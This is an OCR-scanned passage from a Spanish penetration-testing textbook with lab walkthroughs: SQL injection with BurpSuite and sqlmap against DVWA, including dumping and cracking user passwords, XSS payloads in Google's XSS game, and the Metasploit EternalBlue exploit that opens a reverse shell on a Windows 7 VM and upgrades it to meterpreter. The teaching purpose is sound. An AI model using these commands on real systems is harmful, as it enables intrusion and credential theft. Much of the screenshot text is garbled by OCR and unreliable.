Luego de esto, les aparecerá en la terminal la dirección donde puedes acceder 


a las páginas de la plataforma (en mi caso está en 192.168.1.66), y el usuario que es 
root, y la contraseña que es owaspbwap 
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Ahora si, vamos a entrar a la plataforma ingresando esa IP en el navegador. 








owaspbwa 
‘OWASP Broken Web Applications Project 
= Version 12 


Thus is the VM for the Open Web Application Socunty Project (OWASP) Broken Web Applications project it contains many very vubsctebis web applieanoas which are listed belove Store information «bout tkis projeeteea Pe 
De found h the project User Guide arsi Home Page: È 


For details about tha known minaralviriac te thase appiradans. see htins.lisoureetarge, netpiowaspbawa RICKS NT 





H $ This VM has many Sarines security issues. Yer strongly recommend thet 
Í G you run k only on the “host only" ar "NAT network in the ziranik ans 
i stings #1 


Sowas? RatiaGont 

bed 2 à Ey hs > à 
Magai Code infection Rainbow 
‘ama Vulueruble Web Application 





Aqui el apartado que nos interesa es el que se llama “Damn Vulnerable 
Web Application”, aunque existen otras páginas en esta plataforma donde podrán 
practicar esto. 


Bien, haz clic en el botón mencionado, y te llevara a una página como la 
siguiente. 


Aqui el usuario y la contraseña son admin. 


Username 








Al entrar, verán este panel, aquí podrán elegir varias formas de practicar 
vulnerabilidades en páginas y aplicaciones web. 
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Welcome to Damn Vulnerable Web App! 
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. its main goals 
are to be an aid for security professionals to test their skills and tools in a legal environment, help web 


developers better understand the processes of securing wed applications ana ald teachers/students to 
teachiicam web application security in a class room environment. 


WARNING! 


Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public htmi folder or 
any intemet tacing wed Server as it vill be compromised. We recommend dowloading and installing XAMES 
onto a local machine inside your LAN which is used solely for testing. 


Disclaimer 


We do not take responsibility for the way in which any one uses this application. We have made the purposes of 
the application clear and it should not be used maliciously. We have given wamings and taken measures ta 
prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation 
Of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it. 


General Instructions 


The help button allows you to view hits/tips for each vulnerability and for each security level on their respective 
page. 


: You have logged in as "admin 





Una vez aquí, seleccionen la opción de “SQL Injection”, ya que es lo que 
practicaremos en esta sección. 


Vulnerability: SQL Injection 





fonm-chent-sheet 
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Ahora empezaremos con el ataque, lo primero que necesitamos saber siempre 
que realicemos un ataque de este tipo, es si necesitamos una sesión, por ejemplo, en 
este caso, no podríamos entrar a este panel sin habernos autenticado con el usuario 
y contraseña “admin”, eso nos da una sesión, y esta se graba en lo que llamamos 
“cookie”, lo primero que haremos es obtener la “cookie”. 


Esto solo es necesario si se requiere una sesión, en páginas que no tienes que estar 
autenticado para acceder, esto es innecesario, no estorba, pero no es necesario. 





4.7.2.2 BURPSUITE 


BurpSuite es una herramienta que nos sirve para explotación web, no es 
realmente necesario utilizar esta herramienta a fuerzas para interceptar las cookies 
(hay otras herramientas más sencillas que pueden hacerlo), sin embargo, BurpSuite 
es una herramienta muy importante para el área de pentesting y explotación web, así 
que he decidido utilizar esta herramienta para interceptar las cookies. 





Primero, tenemos que entender que es BurpSuite, esta herramienta funciona 
como un proxy entre tu navegador y la página a la que quieres entrar, interceptando 
todos los paquetes enviados, esto te permitirá tanto ver cómo funciona una página 
web y que está mandando, como controlar qué paquetes y métodos pasan al servidor 
de la página web y cuáles no. 


Para abrir esta herramienta, puedes hacerlo escribiendo “burpsuite” en la 
terminal, o haciendo clic en el icono de este a la izquierda en Kali. 


File Edit View Search Terminal Help 
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Vamos a seleccionar un proyecto temporal por el momento, aunque en una 
prueba de penetración probablemente preferirás guardar tu sesión como un proyecto. 


E) welcome to Burp Suite Community Edition. Use the options below to create or open a project BURPSUITE 


Note. Disk-based projects are osiy supported on Burp Suite Professional COMMUNITY EDITION 


@ Temporary project 


Š New project on disk 


& Open existing project 


ler and Sanser 





Una veziniciado, veras este panel, (como podrás notar) tiene muchas funciones 
esta herramienta, desde spiders, hasta ataques de fuerza bruta y decodificadores, pero 
primero lo primero, vamos a configurarlo para funcionar con nuestro navegador, así 
que seleccionaremos proxy. 








image and general binary content: hiding 4xx responses: hiding empty folders 





Luego options, y verificaremos la configuración del proxy, en este caso está 
corriendo en nuestro localhost en el puerto 8080. 
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| (3) Proxy Listeners 
de 


B Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use one of the | 





‘Running Interface [Invisible | Redirect - 
127.0.0.1:8080 








Each installation of Burp generates its own CA certificate that Proxy listeners can use when negotiating SSL connections. You can import or 
tools or another Installation of Burp. 


[Import f export CA certificate | | Regenerate CA certificate | 








Ahora configuraremos nuestro navegador para que mande todos los paquetes 
a ese puerto, para esto, abre el navegador (Firefox es el que está por defecto), las 
opciones a la derecha, y haz clic en el botón preferences. 





| ee New Private Window Ctri+ShiteP 
E Restore Previous Session 
| 








CirhHShiRHA 


{3% Preferences 


+ af Customize... 





Ahora selecciona en general, y la opción proxies, esta opción debe de estar en 
todos los navegadores, así que si usas otro navegador igual debes de poder hacer esto. 
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TES 2 SR 
SS Firefox Updates 
Q Search 


Keep Firefox up to date for the best performance, stability, and security. 


8 Privacy € Security Version 66,2.0esr (32-bit) What's new 
Kali Linux distribution file 

E Firefox Account Kali - LO 
Y. Automatically update search engines 


Performance 
Y. Use recommended performance settings Learn more 
These settings are tailored fo yout competer’s hardware and operating system. 


Browsing 


Use autoscrolling 
Y. Use smooth scrolling 
Always use the cursor keys to navigate within pages 


Search for text when you start typing 


Network Proxy 


O Firefox Support Configure how Firefox connects to the internet. Learn Mare 





Y ahora simplemente selecciona la opción manual proxy configuration, 
recuerda que debe estar configurado en el mismo puerto que BurpSuite y en el localhost. 


Connection Settings 


Configure Proxy Access tothe internet 
No proxy 
Auto-detect proxy settings for this network 
Use system proxy settings 
© Manual proxy configuration 
HTTP Proxy 127.0.0.1 


Y Use this proxy server for all protocols 


SOCKS vs $ SOCKS ys 
No Proxy for 
locathost, 127.0.0.1 


Example: mozilla.org, net.nz, 192.168. 10/24 


Automatic proxy configuration URL 


Da not prompt for authentication if password is saved 
Help 
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Ahora en BurpSuite vamos a irnos a la sección intercept. 


_ Burp Suite Community Edition vL.7.36 - Temporary Project 























Y listo, ya esta todo configurado, ahora cualquier cosa que mandes por tu 
navegador tendrá que pasar por BurpSuite, aqui hay dos botones importantes, el 
primero es forward, que permitirá que los paquetes continúen su ruta normal, drop, 
que tirara las conexiones, y el código en la consola te dará la capacidad de editarlo 
si lo deseas. 


Ahora regresemos a la página de DVWA, y metamos algo en el espacio, 
puedes poner lo que sea, en mi caso escribí un simple “1”. 











Notaras que se queda cargando la página, esto es porque los paquetes están 
“detenidos” por BurpSuite, así que vamos a la consola de BurpSuite. 


Como podrás notar, ahora nos aparece información en la consola, esto 
es referente a lo que se está enviando a la página, desde aquí ya podemos ver la 
cookie, que es lo primero que buscábamos, seleccionada en rojo, vamos a copiarla y 
guardarla en una nota. 
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vulnerabilities/mqli/?id=lasubmit=Subsit #HTIP/ 1.1 
¢ 192,188,1,46 


ner- Agent: Mozilla/5.0 (xil: Linux 1886; rv:€0,0} Gecko/20100101 Firefox/60.9 
hocept: text/html, application/xhtmil¢xal.application/xml:q20.9.*/*:q26.8 

Accept-Language: en-UG,en:g=G.5 
ceept-Eneoding: gzip. deflate 
E s hHrtpo:7//13 SE. ¿sua i 
Cookie: security=low; acopendivida 
PHPSESS Denk 20bur3rigcprga eat? jk36u4 


iss 


mee E [en Z 
zaxingset, Jorto, phppb2,redmine; acgrouprwithpersiat=nada: 





Ahora lo que necesitas es la URL, esto lo puedes sacar de la barra de dirección 


siguiente, o haciendo clic derecho en la consola de BurpSuite, y seleccionando “copy 
URL”. 













Send to Spider 


Oo an active scan 
Send to intruder Ctri+t 
Send to Repeater Ctri+R 


Send to Sequencer 
Send te Comparer 
Send te Decoder 
Request in browser 









Engagement tools [Pro version only} 
~~ Change request method 
Change body encoding 
Copy URL 


Copy as curl command : 
Copy to file > 








Luego de esto deberás tener en tu nota algo similar a esto: 


‘Cookie: security=low; PHPSESSID=nk2@bsr3r7qcprgaeat9jk36s4 
http://192.168.1.66/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit 


4.7.2.3 INYECCION SQL (SQLI) - PRACTICA 


A este punto, ya tenemos todo lo que buscábamos de BurpSuite, así que ya 
podemos cerrarlo, y abrir una terminal, en esta, vamos a utilizar una herramienta 
llamada SQLMap, esta herramienta puede ser utilizada con mandarla llamar desde 
la terminal y darle ciertos parámetros. 
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La estructura es la siguiente, primero tenemos que llamar por nombre a 
sqlmap, luego, tenemos que darle la bandera -u para darle una URL a donde atacar, 
luego darle la URL en comillas, y en este caso, es requerida la cookie, así que se la 
daremos con la bandera --cookie, seguido de la cookie entre comillas (recuerda que 
esto solo es necesario en páginas con autenticación), y posteriormente le pediremos 
algo, en este caso, le pediremos las bases de datos, con la bandera --dbs 


:/# sqimap -u “http://192.168.1.66/dvwa/vulnerabitities/sqli/?id=18Su 





--cookie “security=low; PHPSESSID=nk20bsr3r7gcprgaeat9jk3654" --dbsf 


Luego de presionar enter, la herramienta buscara por potenciales métodos 
vulnerables a inyección, hay que esperar un par de minutos a que la herramienta 
termine su trabajo. 


] testing connection to the target URL 

] checking if the target is protected by some kind of WAF/IPS/IDS 

] testing if the target URL content is stable 

] target URL content is sta 

A] testing if GET parameter ‘i 

] 6] GET parameter 'id' does not appear 

] heuristics detected web page charset 

] heuristic (basic) test shows that GET parameter 'id' might be injectable 
(possibe DBMS: 'MySQL') 

S7) 1 heuristic (XSS) test shows that GET parameter ‘id‘ might be vulnerable t 

o cross-site scripting (XSS) attacks 
[92:51:57] [INFO] testing for SQL injection on GET parameter 





Para cuando termine la herramienta (recuerda presionar Y en lo que sea 
indicado y N si es innecesario), debería mostrar una pantalla similar a esta, mostrando 
las bases de datos disponibles debido a que se confirmó la vulnerabilidad. 


E dE the back-end DBMS is MySQL 
web server operating sys Linux Ubuntu 10.04 (Lucid Lynx) 
web application technology: PHP 5.3.2, Apache 2.2.14 
back-end DBMS: MySQL >= 5.0 
i 52] [NFO] fetching database names 
] sed SQL query returns 2 entries 
Ie 3 trieved: information_schema 
] ved: dvwa 


available database 
[+] dvwa 
[*] information schema 


] [22£c] fetched data logged to text files under '; 


[*] shutting down at 02:57:53 
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A este punto sabemos es vulnerable el sistema, que existen dos bases de 
datos, llamadas “dvwa” y “information_schema”. 


Luego de esto, vamos a robar información de estas bases de datos, tomando 
de ejemplo a la que se llama dvwa, pero primero un poco de fundamento de bases 
de datos. 


Las bases de datos se conforman de jerarquías, y van así: 


Y Base de Datos 
Y Tablas 

Y Columnas 

Y Datos 


Y en SQLMap se puede pedir información dentro de una de esta jerarquía, o 
quienes están dentro de esta. En esta tabla están los parámetros. 


Pedir quien está en esta Pedir datos dentro de 
jerarquía esta jerarquía 


Jerarquía 





Esto es importante porque tenemos que seguir esta estructura para pedirle a 
SQLMap que nos dé información, por ejemplo, ahora le diremos que nos de todas las 
tablas que están dentro de la base de datos dvwa, para esto, diremos que queremos 
sacar de la base de datos dvwa con la bandera -D, las tablas, con la bandera --tables. 





:/# sqimap -u “http://192.168.1.66/dvwa/vulnerabilities/sqli/?id=16Submit=Submit" 
“security=low: PHPSESSID=nk20bsr3r7acprgaeat9jk3654" -D dvwa --tables 









~- Cookie 





Ahora podemos ver las tablas como resultados. 


Database: dvwa 
[2 tables] 





238 ELLIBRO BLANCO DEL HACKER. 2° EDICIÓN ACTUALIZADA © RAMA 


Ahora pediremos las columnas con la bandera --columns dentro de la tabla 
con la bandera -T de users. 


1/?1d=16Submit=Submit” 
fa -T users --columns 





Database: dvwa 
Table: users 
[6 columns] 


varchar(15) 
avatar varchar(70) 
first name varchar(15) 
last name varchar(15) 
password varchar (32) 
user id 





Y finalmente, queremos los datos, sacados con la bandera --dump, de las 
columnas (pueden ser varias), user y password, con la bandera -C. 
:/# sqlmap -u “http: //192.168.1.66/dvwa/vulnerabilities/sqli/?id=l&Submit=Submit" 


--cookie “security=low; PHPSESSID=nk20bsr3r7qcprgaeat9jk36s4" -D dvwa -T users -C user, 
password --dump 





En este caso las contraseñas estan “hasheadas”, o encriptadas, por eso 
aparecen contraseñas tan complejas, así que dejaremos que SQLMap las desencripte 
usando un diccionario, así que al preguntar si queremos crackear las contraseñas 
vía un ataque de diccionario, seleccionaremos Y seguido de 1 para seleccionar el 
diccionario por defecto de SQLMap. 

] used SOL query returns 6 entries 
ected web page charset ‘a 


c3966d7e0d4 fcc69216b 


user 


ES] elicbb19052 
{ > 1 £ tore ganized possible p rd r 

do you want to store hashes to a temporary file for eventuat further processing with other 
tools [y/N] | 
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do you want to crack them via a dictionary-based attack? [Y/n/q] y 

f lek } using hash method eri 

What dictionary do you want to use? 

[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) 


[2] custom dictionary file 
[3] file with list of dictionary files 
> if 





Ahora esperaremos un par de minutos, en lo que la herramienta crackear las 
contrasefias, podemos ver en la terminal como va avanzando. 


cracked password ‘ for hash 
cracked password or hash '2 
cracked password a! for hash '8 
cracked password ‘lets for hash 
current status: lukie... A 





Y finalmente, nos entregara un resultado similar a los anteriores, con los 
usuarios y contrasefias ya en texto plano. 


8d3533d75ae2c3966d7e0d4fcc69216b (charley) 

21232f297a57a5a743894a0e4a801Fc3 (admin) 
gordonb | e99a18c428cb38d5f260853678922e03 (abc123) 
pablo | ed107d09f5bbe40cade3de5c7led9e9b7 {letmein) 


smithy 5f4dcc3b5aa765d61d8327deb882cf99 (password) 


i 
| eel1cbb19052e40b07aac0ca060c23ee (user) 





Aquí algo importante es que hayas puesto atención a la estructura de 
SQLMap, pero esta metodología puede ser utilizada con virtualmente cualquier 
sistema que tenga la vulnerabilidad de SQLi, sin embargo, úsala con cuidado, ya 
que esta es una vulnerabilidad crítica aun relativamente común y explotarla contra 
sistemas sin autorización puede meterte en problemas reales. 


Adicionalmente, te recuerdo que antes de hacer este ataque debes de 
haber identificado la vulnerabilidad en el paso dos de la metodología (análisis de 
vulnerabilidades). 
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4.7.3 Cross Site Scripting (XSS) 


Cross-Site Scripting, mejor conocidocomo XSS, es otra de las vulnerabilidades 
más comunes en aplicaciones web, al igual que la inyección SQL, permite ejecutar 
comandos, pero estos son del lado del cliente, en vez del lado de servidor o base de 
datos, esto significa que un atacante puede utilizar esta vulnerabilidad para atacar a 
todos los que visiten o utilicen un sitio web, desde inyectar código malicioso, hasta 
robar información de los clientes, además, es posible realizar ataques de defacing 
con esto, que afectaría seriamente a la organización comprometida en términos de 
reputación u otras maneras que afectan directa o indirectamente en el bolsillo o 
credibilidad de la organización. 


Esta vulnerabilidad aún es una de las más comunes y más graves, ha afectado 
hasta a organizaciones tan grandes como Twitter, Facebook, YouTube, entre otras. 


4.7.3.1 TIPOS DE XSS 


Esta vulnerabilidad no existe en un solo “sabor”, hay varios tipos de ataques 
y vulnerabilidades XSS que pueden afectar en diferente forma a la seguridad de una 
página web. 


Hay más formas de XSS de las que hablaré, pero estas dos son las más 
comunes. 


4.7.3.1.1 Reflejada (no persistente) 


La versión no-persistente, o mejor conocida como reflejada de XSS es 
la forma más sencilla de esta vulnerabilidad. Velo así, imagínate 10 personas, 
incluyéndote, están viendo un monitor cada uno que muestra exactamente lo mismo 
para todos, y tú le avientas una pelota que hace que parpadee por unos minutos, y a 
las otras 9 personas les aparece eso exactamente igual que en tu monitor, pero si no 
sigues apuntando pelotas, el monitor se normaliza tanto para ti como para los demás. 


Así es como funciona esta vulnerabilidad, realizas el ataque y a todos les 
aparece, por ejemplo, podrías mandar a todos los que estén viendo una página en 
el momento que se ejecute código malicioso, o que los dirija a otro sitio, pero solo 
afectara en ese momento. 
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4.7.3.1.2 Persistente (almacenada) 


Esta forma de XSS es mucho mas devastadora, esto ocurre cuando el ataque 
hecho por el atacante se graba en el servidor, y se muestra permanentemente en las 
página o aplicación web. 


Esto puede dejar código malicioso corriendo indefinidamente en páginas 
web, afectando a todos los que visiten la página o mostrando información incorrecta, 
o hasta un defacing. 


4.7.3.2 PRACTICA: XSS 


Para practicar XSS, a pesar de que en DVWA hay una sección donde pueden 
practicar esto, me agrada más la interfaz y lo práctico (dado que no necesitas ningún 
software o sistema adicional que un navegador) que es el juego de XSS de Google, 
para entrar, dirígete a la URL https://xss-game.appspot.com/ . 


Una vez aquí, verás esta pantalla. 


Warning: You are entering the XSS game area 


Welcome, recruit! 


Cross-site scripting {XSS} bugs are one of the most common and dangerous types of 
vulnerabil e n Web applications. These nasty buggers can allow your enemies 
to steal or modify user data in your apps and you must learn to dispatch them, 

pronto! 


we w very well how important these bugs are. In fact, Google is so 
about 
$7,508 for dangerous XSS bugs discovered in our most sensitive products. 


In this training program, you will learn to find and exploit XSS bugs. You'il use 
this knowledge te confuse and uriate your adversaries by preventing such bugs 


from happening in your applications. 


There wiil be cake at the end of the test. 





Haz clic en el botón verde, y te llevara al primer nivel de seis, en este nivel. 
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[1/6] Level 1: Hello, world of XSS 


Mission Description 


This level demonstrates a common cause of cross-site scripting where user input 
is directly included in the page without proper escaping. 


Interact with the vulnerable application window below and find a way to make it 
execute JavaScript of your choosing- You can take actions inside the vulnerable 
window or directiy edit its URL bar. 

Mission Objective 
Inject a script to pop up a JavaScript alert() in the frame below. 

Once you show the alert you will be able to advance to the next level. 


Your Target 


we (am vulnerable 








URL| https: //xss-game.appspot.com/levell/frame 





FourOrFour 


Enter query here... 





En este nivel, deberás hacer la inyección XSS más básica, en este caso, 
inyectar un script que cree una alerta en la página, este es un tipo de inyección 
reflejada. 


Para hacer esto, escribe el script <seript>alert(“hacker”)</script>. 


Este script es muy sencillo, es un script en JavaScript como lo que 
utilizamos en cualquier página para crear una alerta, sin embargo, como esta página 
es vulnerable, tomará el script en la búsqueda y lo ejecutará en los clientes. 
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Al tener éxito la pagina te felicitara y te dara paso al siguiente reto. 


[1 /6 xss-game.2ppspot.com says , SS 


Congratulations, you executed an alert: 
hacker 


TS YOU can now adi $ next level, ere user input 


is d ig. 

Interact with way to make it 
execute JavaScript of your choosing. You Can take actions inside the vulnerable 
window or directly edit its URL bar. 

Mission Objective 
nject a script to pop up a JavaScript alert(} in the frame below. 

Once you show the alert you will be able to advance to the next level. 


Your Target 


wg Lam vulnerable 


URL | https: //xss-game.appspot .com/leveli/frame?query=<script>alert(“hacker")</script> 





FourOrFour 


Sorry, no results were found for . Try again. 





Ahora, en el segundo nivel, te pedirá que hagas otra inyección XSS, pero 
ahora del tipo persistente, lo cual es un poco más avanzado. 


En este ejercicio, estás en una página que te permite hacer posts, y estos se 
quedan grabados. 
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[2/6] Level 2: Persistence is key 


Mission Description 
epplications often keep user data in server-side and, incr gly, client- 
side databases and later display it to users. No matter where such user 
controlied data comes from, it should be handled carefully. 
This level shows how easily XSS bugs can be introduced in complex apps. 
Mission Objective 


Inject a script te pop up an alert{) in the context of the application. 


Note: the application saves your p< 
alert, this level will be st 











y You 
} Sat Oct 13 2018 13:01:40 GMT-0500 {Central Daylight Time) 


Welcome! 


This is your persona/ stream. You can post anything 
you want here, especially madness. 


Target code (toggle) 


Hints @/3 (show) 





Para resolver este reto, lo primero que probablemente intentaste, es utilizar 
el mismo script que en el reto pasado(<seript>alert(“hacker”)</script>) a ver qué 
sucede, te darás cuenta de que esto no funciona, dejando un espacio blanco en el 
chat. 


© RA-MA Capítulo 4. EXPLOTACIÓN 245 





URLi htips://xss-geme.appspot.com/level2/fraze 
KECEME 








This is your personal stream. * n post anything 
you want here, especially mad 


You 
Sat Gct 13 2018 13:10:25 GMT-0500 {Centrai Daylight Time) 


Prueba del chat 


You 
Sat Oct 13 2018 13:10:29 GMT-0500 (Central Daylight Time} 





Aquí la falla la podríamos encontrar en el código o probando distintas 
cosas, notamos que en las imágenes podemos crear errores, entonces simplemente le 
decimos que hacer al encontrar un error, con el código <img sre=’hacker’ onerror 
=’alert(“hackeandoando”)’> 


‘SS-GamMe.appspot.com says key 


, fou executed ar alert: 


Web applicatio w advance to the next level ingly, client 
side such user- 
This level shows now easziy ASS bugs can be introduced in € 

Mission Objective 
Inject i Op up an alert {} in the context of the applicati 


Note: the application səves your posts so if in code t cecute th 
alert, this level will be solved ev you reload 
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Hay otros cuatro niveles, sin embargo, creo que es mas apropiado que sigas 
en esto por tu cuenta, recuerda, la meta aqui es generar errores utilizando código 
JavaScript y HTML, utiliza la documentación de OWASP para ayudarte. 


4.7.4 Exploits de Metasploit 


Hasta ahora hemos explorado algunos de los exploits más comunes en 
aplicaciones y páginas web, sin embargo, debemos de recordar que existen muchas 
otras plataformas en las que existen vulnerabilidades que permiten explotación, y 
una de mis herramientas favoritas para esto sigue siendo Metasploit. 


A este punto ya conoces la estructura de Metasploit, así que notaras que 
el módulo que nos interesa realmente es el de “exploit”, abre la herramienta y 
empecemos a explorar este módulo más. 


4.7.4.1 HACKEANDO WINDOWS MODERNO - (ETERNALBLUE, ETERNALPULSAR, 
ETERNALROMANCE) 


En estos últimos años fue liberado un exploit que ha probado ser devastador 
para el sistema operativo Windows, desde los Windows 7, hasta los Windows 
Servers, ya que ha afectado a casi todas las versiones del sistema moderno, esta 
vulnerabilidad se le llamó EternalBlue, aunque existen ya varias versiones de esta, 
así que vale la pena más investigarlo con el CVE con el que fue reportado, el cual es 
del CVE-2017-0143-CVE-2017-0148 (si, tiene más de un CVE). 


Esta vulnerabilidad nació a partir de una falla en el sistema SMB de 
Windows, y fue utilizada para crear el ransomware WannaCry, que causó pérdidas 
millonarias en muchas organizaciones, ya que, con tener acceso por red al sistema, 
se puede obtener acceso con privilegios elevados por este método. 


4.7.4.1.1 Práctica 


Ahora sí, vamos a realizar el ataque, para esto, abre primero tu sistema 
Windows 7 en la máquina virtual, y tu sistema Kali. 


Asegúrate que ambos tengan visibilidad uno del otro (que estén en la misma 
red), para esto quizás tendrás que deshabilitar el Firewall de Windows (esto es común 
dentro de una red empresarial). 
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wi Windows 7 


g 





Ahora vamos a confirmar que nuestro Windows tiene la vulnerabilidad, 
podríamos hacerlo de distintas formas, incluyendo Nessus, sin embargo, una de mis 
maneras preferidas para algo sencillo como esto es utilizar nmap, ya que es sencillo, 
rápido, y decentemente discreto (comparado con algo como Nessus). 


Para esto, escribiremos en la terminal: 
nmap -p445 --script smb-vuln-ms17-010 192.168.1.141 


Tomando en cuenta que 192.168.1.141 es la IP del Windows que atacaremos, 
también recordemos que esto pudimos encontrarlo si se van a la página de scripts 
de nmap https://nmap.org/nsedoc/index.html y buscan EternalBlue o su CVE, 
encontrarían esta pagina https:/nmap.org/nsedoc/scripts/smb-vuln-ms17-010. 
html con instrucciones de cómo usar el script para determinar si es o no un sistema 
vulnerable a esto. 


File smb-vuln-ms17-919 

Script types: hosirule 

Categories: vuin, safe 

Download: https://svn.nmap.org/nmap/scripts/smb-vuin-mst7-010.nse 
User Summary 


Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms 17-010, a.k.a. EtemalBlue). The vulnerability is actively exploited by 
WannaCry and Petya ransomware and other malware. 


The script connects to the SIPC tree, executes a transaction on FID O and checks if the error “STATUS_INSUFF_SERVER_RESOURCES" Is returned ta determine if the target Is not 
patched against ms17-010. Additionally it checks for known error codes resumed by patched systems. 


Tested on Windows XP, 2003, 7, 8, 8.1. 10, 2008. 2012 and 2016. 

References: 
+ https:/technet.microsoft.com/en-us/library/security/ms17-016.aspx 
« bttps/iblogs.technet.microsoft.com/msre/2017/05/12/customer-quidance-for-wannacrypt-attacks/ 
+ hitps:/imsdn.microsofi.comven-usilibrary/ee44 1489.aspx 


» hitps:/github.comyrapid7/metasploit-framework/biob/master/modules/auxiliaryscannerismbi/smb_ms17_010.rb 
« https://github.comicidrn/nmap-nse-scripts/wiki/Notes-about-smb-vuin-ms 17-010 


See also: 


+ smb-double-puisar-backdoor.nse 
Script Arguments 


smb-vuin-ms17-010.sharename 


Share name to connect. Default: PCS 


smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername 
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Ahora si, ejecutamos el script en nuestra terminal, deberiamos obtener una 
respuesta similar a la siguiente, nota el apartado en el que te dice que el estado de 
este sistema es VULNERABLE. 


Disclosure date: 2817-03- 


ce-for-wannacrypt-att 





Ahora que ya sabemos que nuestro ataque será un éxito, abriremos 
Metasploit con el comando msfconsole. 


Dentro de Metasploit, podríamos poner la ruta donde está el exploit, la cual 
es exploit/windows/smb/ms17_010_eternalblue, sin embargo, si asumimos que no 
conocemos la ruta desde antes, podemos utilizar la palabra reservada search para 
encontrar dicho exploit. 


msf > search eternalblue 
[!] Module database cache not built yet, using slow search 





Esperamos unos cuantos minutos, y en la terminal la herramienta nos dará 
las rutas de los exploits relacionados con Eternalblue, nota que también nos muestra 
la versión compatible con Windows 8, y el script en el módulo auxiliary haría la 
misma función que hicimos con nmap para probar si es vulnerable la máquina o no. 


En este caso nuestra máquina es Windows 7, así que utilizaremos esta versión. 
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Para utilizar el script usaremos la palabra reservada use, ejecutando el 
comando use exploit/windows/smb/ms17_010_eternalblue para abrir el exploit. 





Luego de eso, veremos las opciones que tenemos que modificar con las 
palabras reservadas show options. 


msf exploit{ ) > show options 
Module options (exploit/windows/smb/ms17 010 eternalblue): 


Name 

GroomAltocations 

GroomDeita : y The amount to increase the groom count by per try. 
MaxExploitAttempts The number of times to retry the exploit. 
ProcessName spoolsv.exe y Process to inject payload into. 

RHOST The target address 

RPORT 445 y The target port {TCP) 

SMBDomain 3 t (Optional) The Windows domain to use for authentication 
SMBPass {Optionat) The password for the specified username 
SMBUser t (Optional) The username to authenticate as 
VerifyArch Check if remote architecture matches exploit Target. 
VerifyTarget Check if remote 0S matches exploit Target. 


Exploit target: 


Id Name 





dows 7 and Server 2008 R2 (x64) All Service Packs 


Como podemos notar, casi todas las variables ya tienen valores, sin embargo, 
la más importante, RHOST, aún no tiene variable, esta se refiere a la IP del objetivo, 
la cual es 192.168.1.141, en este caso, el Windows 7. 


Vamos a asignarla con la palabra reservada set, siendo el comando completo 
set RHOST 192.168.1.141. 


) > set RHOST 192.168.1.141 





Y listo, ya estamos preparados para lanzar el ataque, para lanzarlo, 
utilizaremos la palabra reservada exploit, y el ataque iniciara. 


msf exploit( ) > exploit 


¿ Started reverse TCP handier on 192.168.1.67:4444 

192.168.1.141:445 - Connecting to target for exploitation. 

192.168.1.141:445 - Connection establ for exploitation. 

192.168.1.141:445 - Target OS selected for GS indicated by SMB reply 
} 192.168.1.141:445 - CORE raw buffer d 25 bytes} 

6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B 

.141:445 - 0x060006810 61 73 69 20 37 36 30 30 asic 7660 
.141:445 - Target arch selected valid for ar dicated by DCE/RPC reply 
.141:445 - Trying exploit with 12 G Allocations. 
.141:445 - Sending ail but last fr ıt of exploit packet 


192.168. 
} 192.168. 
} 192.168. 
¿ 192.168. 


1 
1 
1 
1 p (2 
~} 192.168.1.141:445 - 0x00906000 57 69 6e 64 
1 3 
1 
1 
1 
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Cuando aparezca esto, significa que el ataque fue exitoso, presiona enter y 
en poco tiempo tendrás una shell del sistema con privilegios elevados. 


192.168.1.141:445 - ETERNALBLUE overwrite completed successfully (8xC000980D) ! 

192.168.1.141:445 - Sending egg to corrupted connection. 

192.168.1.141:445 - Triggering free of corrupted buffer. 

Command shell session 1 opened (192.168.1.67:4444 -> 192.168.1.141:49380) at 2018-10-13 15:24:29 -05090 


192.168.1.141:445 - 
192.168.1.141:445 - 
192.168.1.141:445 - 





Tener esto en la terminal significa que tienes una shell del sistema con 
privilegios elevados, en otras palabras, es como si tuvieras una consola de comandos 
abierta en el sistema. 





indows1system32 


Esto significa que tienes control completo del sistema, felicidades, el ataque 
fue un éxito. 


Post explotación de una shell 


A pesar de que el ataque fue un éxito, notaras que simplemente con una shell 
realmente no tienes tanto control como teníamos con un meterpreter, ya que no 
puedes fácilmente descargar material, subir o acceder a funciones como el teclado, 
cámara, pantalla, etc, al igual generalmente estas limitado a ver archivos del sistema, 
administrarlos o ejecutarlo, a menos que ejecutes un script más avanzado en la terminal. 


C:\Windows\system32>dir 

dir 
El volumen de la unidad C no tiene etiqueta. 
El número de serie del volumen es: 4A19-FD7D 


Directorio de C:\Windows\system32 


13/10/2018 13:49 <DIR> 

13/10/2618 13:49 <DIR> SA 

14/07/2009 04:30 <DIR> 8COA 

13/07/2009 : A aactient.dit 
13/07/2009 24 745. accessibilitycpt.dil 
13/07/2009 :2é .424 ACCTRES.dit 
13/07/2009 4 ; aciedit.dii 
13/07/2009 4 a actui.dtl 





Esto no es un mal nivel de acceso, pero como siempre, queremos más, así 
que, para eso, vamos a transformar nuestra shell en una sesión meterpreter. 


Empecemos por mandar al background la shell, para esto, haz clic en la tecla 
control, y luego la letra z, y presiona y enter para aceptar. 
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C:\Windows\system32>°Z 





Background session 1? [y/N] 


Ahora estas en la consola principal de Metasploit, es tiempo de utilizar el 
módulo POST de esta herramienta, en este caso nos interesa transformar la shell a 
un meterpreter, así que utilizaremos la palabra reservada search para buscar un script 
así, escribiendo search shell _to_meterpreter. 


msf exploit( ) > search shell_to meterpreter 





[!] Module database cache not built yet, using slow search 


En poco tiempo te mostrará los resultados, siendo el script post/multi/ 
manage/shell to _meterpreter el que buscamos. 


Disclosure Date Rank Description 


use post/multi/manage/shell to meterpreter 





J> 
ee | 


Y lo configuraremos como cualquier otro script en Metasploit, escribiendo 
show options para ver las opciones, y posteriormente seleccionaremos que queremos 
ejecutarlo en la sesión 1, qué es la shell que obtuvimos con EternalBlue. 


Recuerda que podemos saber el número de la sesión utilizando la palabra 
reservada sessions -i, y que podríamos modificar las variables LHOST y LPORT si 
quisiéramos mandar el meterpreter a otro puerto o sistema. 


icns (post/multi/manage/she 


l try to auto detect). 





Una vez configurado, iniciamos el script con la palabra exploit. 
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Luego de esto, empezara a procesar el script. 


